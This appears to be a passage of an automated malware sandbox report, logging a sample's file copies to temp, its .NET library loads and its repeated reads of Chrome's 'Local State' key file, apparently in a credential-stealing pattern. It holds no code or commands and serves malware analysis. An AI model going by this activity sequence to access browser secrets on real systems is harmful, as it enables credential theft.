NHPKIZUUSGERQSLBGSEAVXGNDWXNHRIMGKQZIYGMNAKLDSDLMZTSHWNQSMRLTOXKIQVZWPTPMYGCCCTOQMOFGPYVVCCUDORIXMMXDHKCETULBHLJENABEIJPTFOHFPIUUSFPUHSBHENDANFMOYZRZAXYVFEZIKDKUEVZAWEFKRTUJZPFUDMEZZQVBGYMMIHKEBYJMJMTTXSDTDQAUATXLABLBEJUBBPSXZPXMHVNHOHYPKCYLDVGJSBPEXWGYVP
success or wait 1 3E6803 CopyFileW
C:\Users\user\AppData\Local\Temp\tmp3EE2.tmp
0 1026 41 49 58 41 43 56 59 42 53 42 43 5a 44 4a 4d 5a 55 44 56 4e 45 43 4d 46 53 47 4a 53 41 4f 41 49 58 43 4a 46 44 50 48 51 4a 56 55 41 4e 55 46 46 50 51 58 56 59 4a 52 55 47 59 50 4a 47 4b 45 4a 4e 58 43 42 54 58 41 52 41 45 54 41 4b 46 54 4a 4b 56 4c 49 5a 45 58 4c 4d 4f 41 50 56 45 5a 52 5a 5a 55 49 52 44 55 4b 53 50 5a 52 42 50 49 4e 4e 45 4b 4c 43 4c 58 42 48 46 5a 4d 42 52 4a 54 55 4a 5a 54 52 43 47 51 47 46 52 51 43 45 56 50 55 42 41 41 50 42 48 42 54 59 59 48 44 4a 5a 48 48 50 4d 46 41 4b 58 56 4a 50 51 52 51 43 52 55 46 59 50 4d 4e 55 43 52 52 51 4f 59 58 59 45 48 58 51 45 48 57 48 46 4c 5a 53 42 4d 4c 52 52 5a 46 4c 4c 59 55 51 4c 41 44 54 4b 45 44 58 56 44 4c 4b 4c 50 5a 54 54 43 4e 41 58 4d 58 50 53 54 43 48 51 4b 57 4d 53 52 50 4e 52 5a 47 55 4c
AIXACVYBSBCZDJMZUDVNECMFSGJSAOAIXCJFDPHQJVUANUFFPQXVYJRUGYPJGKEJNXCBTXARAETAKFTJKVLIZEXLMOAPVEZRZZUIRDUKSPZRBPINNEKLCLXBHFZMBRJTUJZTRCGQGFRQCEVPUBAAPBHBTYYHDJZHHPMFAKXVJPQRQCRUFYPMNUCRRQOYXYEHXQEHWHFLZSBMLRRZFLLYUQLADTKEDXVDLKLPZTTCNAXMXPSTCHQKWMSRPNRZGUL
success or wait 1 3E6803 CopyFileW
C:\Users\user\AppData\Local\Temp\tmp3FAE.tmp
0 1026 4e 48 50 4b 49 5a 55 55 53 47 45 52 51 53 4c 42 47 53 45 41 56 58 47 4e 44 57 58 4e 48 52 49 4d 47 4b 51 5a 49 59 47 4d 4e 41 4b 4c 44 53 44 4c 4d 5a 54 53 48 57 4e 51 53 4d 52 4c 54 4f 58 4b 49 51 56 5a 57 50 54 50 4d 59 47 43 43 43 54 4f 51 4d 4f 46 47 50 59 56 56 43 43 55 44 4f 52 49 58 4d 4d 58 44 48 4b 43 45 54 55 4c 42 48 4c 4a 45 4e 41 42 45 49 4a 50 54 46 4f 48 46 50 49 55 55 53 46 50 55 48 53 42 48 45 4e 44 41 4e 46 4d 4f 59 5a 52 5a 41 58 59 56 46 45 5a 49 4b 44 4b 55 45 56 5a 41 57 45 46 4b 52 54 55 4a 5a 50 46 55 44 4d 45 5a 5a 51 56 42 47 59 4d 4d 49 48 4b 45 42 59 4a 4d 4a 4d 54 54 58 53 44 54 44 51 41 55 41 54 58 4c 41 42 4c 42 45 4a 55 42 42 50 53 58 5a 50 58 4d 48 56 4e 48 4f 48 59 50 4b 43 59 4c 44 56 47 4a 53 42 50 45 58 57 47 59 56 50
NHPKIZUUSGERQSLBGSEAVXGNDWXNHRIMGKQZIYGMNAKLDSDLMZTSHWNQSMRLTOXKIQVZWPTPMYGCCCTOQMOFGPYVVCCUDORIXMMXDHKCETULBHLJENABEIJPTFOHFPIUUSFPUHSBHENDANFMOYZRZAXYVFEZIKDKUEVZAWEFKRTUJZPFUDMEZZQVBGYMMIHKEBYJMJMTTXSDTDQAUATXLABLBEJUBBPSXZPXMHVNHOHYPKCYLDVGJSBPEXWGYVP
success or wait 1 3E6803 CopyFileW
File Path Offset Length Completion Count Source Address Symbol
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4095 success or wait 1 6D517995 unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 6135 success or wait 1 6D517995 unknown
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll.aux unknown 176 success or wait 1 6D42DE2C ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4095 success or wait 1 6D51A1A4 ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\eb4cca4f06a15158c3f7e2c56516729b\System.Core.ni.dll.aux unknown 900 success or wait 1 6D42DE2C ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\1be7a15b1f33bf22e4f53aaf45518c77\System.ni.dll.aux unknown 620 success or wait 1 6D42DE2C ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\aac4a7fee37b96c05eb0862217745fc1\System.ServiceModel.ni.dll.aux unknown 3948 success or wait 1 6D42DE2C ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\9b0d0cb232dec8e57df49678532cb923\System.Runtime.Serialization.ni.dll.aux unknown 1100 success or wait 1 6D42DE2C ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\cde471ea4f02c36c73581ed5681e463e\SMDiagnostics.ni.dll.aux unknown 924 success or wait 1 6D42DE2C ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\4fbda26d781323081b45526da6e87b35\System.Xml.ni.dll.aux unknown 748 success or wait 1 6D42DE2C ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\1348a5d04b41c614e48fe5fdb88d1cfa\System.ServiceModel.Internals.ni.dll.aux unknown 592 success or wait 1 6D42DE2C ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\fe4b221b4109f0c78f57a792500699b5\System.Configuration.ni.dll.aux unknown 864 success or wait 1 6D42DE2C ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4096 success or wait 1 6C51B2B3 ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4096 end of file 1 6C51B2B3 ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\5faf546a8e018d89b1c277e0be243e4b\System.Net.Http.ni.dll.aux unknown 536 success or wait 1 6D42DE2C ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a#\97cbf6eb6477005cffa6992126db856c\System.Web.Extensions.ni.dll.aux unknown 3712 success or wait 1 6D42DE2C ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Web\9e5950923286f171d1649a05bdc62830\System.Web.ni.dll.aux unknown 3972 success or wait 1 6D42DE2C ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 4096 success or wait 3 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 4096 success or wait 24 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 291 end of file 3 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 4096 end of file 3 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Temp\tmp62EE.tmp unknown 40960 success or wait 1 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Temp\tmp64E3.tmp unknown 40960 success or wait 1 6C51B2B3 ReadFile
File Read
C:\Users\user\AppData\Local\Temp\tmp67A3.tmp unknown 40960 success or wait 1 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 4096 success or wait 1 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 291 end of file 1 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Temp\tmp6C85.tmp unknown 28672 success or wait 1 6C51B2B3 ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Security\754ca70e68140abcdb8476cff64c4169\System.Security.ni.dll.aux unknown 912 success or wait 1 6D42DE2C ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 4096 success or wait 3 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 291 end of file 3 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Temp\tmp71C5.tmp unknown 77824 success or wait 1 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Temp\tmp738B.tmp unknown 77824 success or wait 1 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Temp\tmp7551.tmp unknown 77824 success or wait 1 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 4096 success or wait 3 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 291 end of file 3 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Temp\tmp7718.tmp unknown 77824 success or wait 1 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Temp\tmp790D.tmp unknown 77824 success or wait 1 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Temp\tmp7AA5.tmp unknown 77824 success or wait 1 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Temp\tmp7CF7.tmp unknown 524288 success or wait 1 6C51B2B3 ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\98d3949f9ba1a384939805aa5e47e933\System.Management.ni.dll.aux unknown 764 success or wait 1 6D42DE2C ReadFile
C:\Users\user\AppData\Local\Temp\tmp533A.tmp unknown 4096 success or wait 1 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Temp\tmp3E26.tmp unknown 4096 success or wait 1 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Temp\tmp3EE2.tmp unknown 4096 success or wait 1 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Temp\tmp3FAE.tmp unknown 4096 success or wait 1 6C51B2B3 ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\fb06ad4bc55b9c3ca68a3f9259d826cd\System.Windows.Forms.ni.dll.aux unknown 1720 success or wait 1 6D42DE2C ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\1d52bd4ac5e0a6422058a5d62c9f6d9d\System.Drawing.ni.dll.aux unknown 584 success or wait 1 6D42DE2C ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp\849e4f93d41f8b6645878090ee9a7505\Microsoft.CSharp.ni.dll.aux unknown 700 success or wait 1 6D42DE2C ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic\81f3dddd8aa6172d72bf5f1161e6fd01\System.Dynamic.ni.dll.aux unknown 536 success or wait 1 6D42DE2C ReadFile
Disassembly
⊘ No disassembly